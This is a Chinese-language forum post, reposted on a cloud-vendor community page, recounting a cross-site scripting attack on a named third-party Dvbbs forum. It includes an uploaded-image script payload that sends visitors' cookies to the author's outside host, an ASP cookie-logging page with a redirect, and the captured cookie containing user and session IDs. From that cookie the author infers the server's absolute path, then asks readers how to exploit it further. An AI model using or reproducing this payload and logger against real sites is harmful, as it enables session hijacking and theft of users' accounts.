關於動網的cookie瀉露網站絕路徑的問題

來源:互聯網
上載者:User

一、跨站測試
先看看我的一次跨站測試吧
我以職業欠錢的網站做測試吧:
Host:zhiyeqianqian.51web.cn
My Test:
先在他的論談上傳兩張圖,
圖一的內容是:
<script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script>
得到url為UploadFile/2005-6/200562716565777847.jpg
圖二則是偶的個人照
UploadFile/2005-6/200562716563048909.jpg
寫個盜cookie的代碼到我的空間,lcx的盜cookie代碼有問題,所以修改了一下。
<%
cookiefile=Server.MapPath("cookie.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set cookiefile=fs.OpenTextfile(cookiefile,8,True,0)
cookiefile.Write(Request.QueryString&"<br>")
cookiefile.close
set fs = nothing
%>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://zhiyeqianqian.51web.cn/UploadFile/2005-6/200562716563048909.jpg">
接下來,點擊圖一,自動轉到圖二,

二、結果分析
再到我的空間看一下,抓到cookie如下:
msg=ewwwrootzhiyeqianqianwwwroot=UserID=218&usercookies=1&StatUserID=2190418138&password=想要嗎?嘿嘿&userhidden=2&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzi;%20ASPSESSIONIDQSCAAQTB=HMPLNIMDHOCDJKPELPGBBOOG;%20Dvbbs;%20DvbbsMagicFace=862;%20upNum=2;%20ASPSESSIONIDQSAAARTB=JBPPMONDDEGFGHEOICDHFJIM<br>
分析cookie我們不難看出他的絕對路徑是e:\wwwroot\zhiyeqianqian\wwwroot

三、論談
本來,最初的測試我是在測試BCT論談,成功暴出他的絕對路徑,一開始的時候,我還認為可能又是動網出洞洞了,所以又去測試了其它幾個站,測試結果是其它的網站並沒有暴出路徑,今天再次測試“欠我錢”的論談,卻又暴不出來,查了一下代碼,和別人的代碼一個樣,根本沒什麼差別。
偶想聽聽大家的看法,到底是哪裡出了問題,能不能深入利用~~~

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.